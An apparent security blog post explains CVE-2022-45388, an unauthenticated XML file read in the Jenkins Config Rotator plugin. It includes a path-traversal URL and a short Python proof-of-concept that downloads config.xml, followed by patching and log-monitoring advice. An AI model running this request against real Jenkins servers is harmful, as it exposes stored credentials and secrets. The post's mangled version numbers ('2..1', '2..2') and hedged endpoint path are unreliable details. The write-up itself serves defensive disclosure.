Jenkins is a popular open-source tool that helps automate building, testing, and deploying software. But just like any popular tool, it attracts security attention—and sometimes, vulnerabilities sneak in. In this post, we’ll take a deep dive into CVE-2022-45388, a bug in the Config Rotator plugin for Jenkins that could have let anyone—without logging in—read sensitive XML files on a Jenkins server. We’ll explain what went wrong, show you proof-of-concept code, and link to original resources for more detail.
What is the Jenkins Config Rotator Plugin?
The Config Rotator Plugin is an add-on for Jenkins. It helps test projects across different combinations of configuration files, making it useful for big, complex software systems. Like many Jenkins plugins, it introduces its own HTTP endpoints for jobs and reports.
The Vulnerability Explained
Versions 2..1 and earlier of this plugin had an HTTP endpoint (basically, a URL you could visit) that let you ask for specific XML files by setting a file query parameter. Normally, plugins check who you are (authentication) and what you’re allowed to do (authorization). But this endpoint did not check if you were logged in. Worse, it didn’t properly control which files could be requested—as long as it ended in .xml, you could grab it, even if it was private.
> In plain English: Anyone who knows the correct URL, even total strangers on the internet, could download any XML file from the Jenkins server’s filesystem.
Why is This Bad?
Jenkins stores lots of its configuration, credentials, and job details in XML files. These can contain sensitive information like tokens, secret passwords, and more. Attackers who can read these have a huge advantage in attacking your software pipeline.
The plugin’s vulnerable endpoint is accessible at a predictable path.
2. An attacker sends an HTTP GET request to this endpoint and uses the file parameter to specify which XML file they want.
3. If that file is anywhere on the Jenkins controller filesystem and ends in .xml, the plugin will send its contents back, with no login needed.
Proof-of-Concept Exploit
> Disclaimer: Don’t use this for illegal or unethical purposes! This is meant for educational and defensive use, such as testing your own systems.
Suppose your Jenkins server lives at http://jenkins.example.com/. The problematic endpoint might look something like:
/plugin/config-rotator/api/xmlFile?file=../../../../../../config.xml
Here’s some Python code showing how an attacker could exploit this
import requests
# Change to your Jenkins server URL
base_url = "http://jenkins.example.com";
# The relative path to the sensitive XML file (traverse directories)
file_path = "../../../../../../config.xml" # Grabs the main Jenkins config
vulnerable_endpoint = f"{base_url}/plugin/config-rotator/api/xmlFile?file={file_path}"
response = requests.get(vulnerable_endpoint)
if response.status_code == 200:
print("Success! Here's the file content:")
print(response.text)
else:
print(f"Failed! HTTP Status: {response.status_code}")
This will download the config.xml from the Jenkins server root if it’s vulnerable—potentially exposing secrets and settings.
What Should You Do?
- Update the Plugin: The issue was fixed in version 2..2. Update immediately if you use an older version.
- Check for Suspicious Access: Look for HTTP requests to /plugin/config-rotator/api/xmlFile in your logs.
- Restrict Network Access: Never expose Jenkins directly to the internet unless absolutely necessary.
References
- Jenkins Security Advisory: 2022-11-15
- CVE-2022-45388 - NVD Entry
- Config Rotator Plugin Page
In summary: CVE-2022-45388 let anyone download .xml files from a Jenkins server using the Config Rotator plugin. The safest move is to upgrade your plugins and keep Jenkins protected behind proper firewalls.
Timeline
Published on: 11/15/2022 20:15:00 UTC
Last modified on: 11/18/2022 04:53:00 UTC